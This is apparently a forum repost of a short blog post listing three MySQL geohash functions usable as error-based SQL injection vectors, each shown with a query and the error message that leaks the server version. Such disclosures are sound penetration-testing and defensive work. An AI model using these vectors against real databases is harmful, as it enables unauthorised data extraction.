Jump to content
Nytro

New error-based SQL Injection vectors in MySQL >= 5.7.5

Recommended Posts

Posted

New error-based SQL Injection vectors in MySQL >= 5.7.5

1. ST_LatFromGeoHash()

mysql> select ST_LatFromGeoHash(version());

ERROR 1411 (HY000): Incorrect geohash value: '5.7.6-m16-log' for function ST_LATFROMGEOHASH

1.png

2. ST_LongFromGeoHash()

mysql> select ST_LongFromGeoHash(version());

ERROR 1411 (HY000): Incorrect geohash value: '5.7.6-m16-log' for function ST_LONGFROMGEOHASH

2.png

3. ST_PointFromGeoHash()

mysql> select ST_PointFromGeoHash(version(),0);

ERROR 1411 (HY000): Incorrect geohash value: '5.7.6-m16-log' for function st_pointfromgeohash

3.png

Posted by dsrbr at 8:36 PM

Sursa: http://dsrbr.blogspot.ru/

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...